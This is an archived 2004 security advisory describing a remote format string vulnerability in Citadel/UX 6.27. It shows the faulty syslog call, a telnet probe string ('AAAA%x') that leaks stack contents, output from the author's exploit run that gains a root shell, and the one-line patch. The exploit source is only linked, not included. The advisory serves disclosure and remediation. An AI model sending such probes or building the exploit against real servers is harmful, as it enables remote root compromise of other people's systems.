what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

nsg-advisory-09.txt

nsg-advisory-09.txt
Posted Dec 12, 2004
Authored by CoKi | Site nosystem.com.ar

No System Group Advisory #09 - Citadel/UX versions 6.27 and below suffer from a format string vulnerability that allows for remote root exploitation.

tags | advisory, remote, root
SHA-256 | 4696971823e199337cff698d475784868739e6f9e92bff094b13b9b3806b7141

nsg-advisory-09.txt

Change Mirror Download
-------------------------------------------------
No System Group - Advisory #09 - 12/12/04
-------------------------------------------------
Program: Citadel/UX
Homepage: https://www.citadel.org
Operating System: Linux and Unix-Compatible
Vulnerable Versions: Citadel/UX v6.27 and prior
Risk: High
Impact: Remote Format String Vulnerability
-------------------------------------------------


- DESCRIPTION
-------------------------------------------------
Citadel/UX is an advanced client/server messaging and
collaboration system for BBS and groupware applications.
Users can connect to Citadel/UX using any telnet, WWW,
or client software. Among the features supported are
public and private message bases (rooms), electronic
mail, real-time chat, paging, etc. The server is
multithreaded and can easily support a large number of
concurrent users. In addition, SMTP, IMAP, and POP3
servers are built-in for easy connection to Internet
mail. Citadel/UX is both robust and mature, having been
developed over the course of the past thirteen years.

More informations at: https://www.citadel.org


- DETAILS
-------------------------------------------------
Exist a format string bug in the lprintf() function
of sysdep.c when parses erroneous arguments to the
syslog() function. This may to cause a denial of
service or give remote shell with privileges of
Citadel/UX.

---------- sysdep.c ----------
108: void lprintf(enum LogLevel loglevel, const char *format, ...) {
109: va_list arg_ptr;
110: char buf[SIZ];
111:
112: va_start(arg_ptr, format);
113: vsnprintf(buf, sizeof(buf), format, arg_ptr);
114: va_end(arg_ptr);
115:
116: if (syslog_facility >= 0) {
117: if (loglevel <= verbosity) {
118: /* Hackery -IO */
119: if (CC && CC->cs_pid) {
120: memmove(buf + 6, buf, sizeof(buf) - 6);
121: snprintf(buf, 6, "[%3d]", CC->cs_pid);
122: buf[5] = ' ';
123: }
124: syslog(loglevel, buf); // <-- the format bug
125: }
126: }
---------- sysdep.c ----------

Now we proceed to see what happens.

coki@nosystem:~/audit$ telnet localhost 504
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
200 nosystem Citadel server ready.
AAAA%x
530 Unrecognized or unsupported command.
quit
200 Goodbye.
Connection closed by foreign host.
coki@nosystem:~/audit$

We connect us to Citadel/UX server to 504 port and
send a test string.

coki@nosystem:~/audit$ tail -n 5 /var/log/messages
Dec 12 11:08:18 nosystem citadel[1305]: Database log file cull ended.
Dec 12 11:08:19 nosystem citadel[1303]: [ 1] Session started.
Dec 12 11:08:33 nosystem citadel[1303]: [ 1] Citadel: AAAA8090fe0
Dec 12 11:08:35 nosystem citadel[1303]: [ 1] Citadel: quit
Dec 12 11:08:35 nosystem citadel[1303]: [ 1] Session ended.
coki@nosystem:~/audit$

We can to see part of the stack sending a malicious format string.


- EXPLOIT
-------------------------------------------------
I have written a code exploit that use this format bug
for to obtain a remote shell in a target.

https://www.nosystem.com.ar/exploits/citadel_fsexp.c

coki@servidor:~$ make citadel_fsexp
coki@nosystem:~/audit$ ./citadel_fsexp -h localhost -t0

Citadel/UX v6.27 remote format string exploit
by CoKi <coki@nosystem.com.ar>

[*] host : localhost
[*] system : Slackware Linux 10.0
[*] syslog GOT address : 0x0809e9e8
[*] RET address : 0xbfffd5fa

[+] verifying host... OK
[+] conecting... OK
[+] building evil buffer... OK
[+] sending evil buffer... OK

[+] waiting for shell...
[+] connecting to shell... OK

[!] you have a shell :)

Linux nosystem 2.4.26 #29 Mon Jun 14 19:22:30 PDT 2004 i686 unknown unknown GNU/Linux
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy)


- SOLUTIONS
-------------------------------------------------
The patch is included here:

--- sysdep.c 2004-11-03 17:19:00.000000000 -0300
+++ sysdep.c 2004-12-12 13:14:12.000000000 -0300
@@ -121,7 +121,7 @@
snprintf(buf, 6, "[%3d]", CC->cs_pid);
buf[5] = ' ';
}
- syslog(loglevel, buf);
+ syslog(loglevel, "%s", buf);
}
}
else if (loglevel <= verbosity) {


- REFERENCES
-------------------------------------------------
https://www.nosystem.com.ar/advisories/advisory-09.txt


- CREDITS
-------------------------------------------------
Discovered by CoKi <coki@nosystem.com.ar>

No System Group - https://www.nosystem.com.ar
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close